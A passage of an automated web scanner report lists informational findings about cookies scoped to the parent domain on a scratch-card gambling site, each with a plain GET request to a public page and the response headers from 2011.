The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

11.84. http://www.bigmoneyscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.85. http://www.bigmoneyscratch.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.86. http://www.bigmoneyscratch.com/FAQ.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FAQ.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.87. http://www.bigmoneyscratch.com/FairPlay.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.88. http://www.bigmoneyscratch.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.89. http://www.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.90. http://www.bigmoneyscratch.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.91. http://www.bigmoneyscratch.com/Mobile.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Mobile.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.92. http://www.bigmoneyscratch.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.93. http://www.bigmoneyscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.94. http://www.bigmoneyscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.95. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.96. http://www.bigmoneyscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

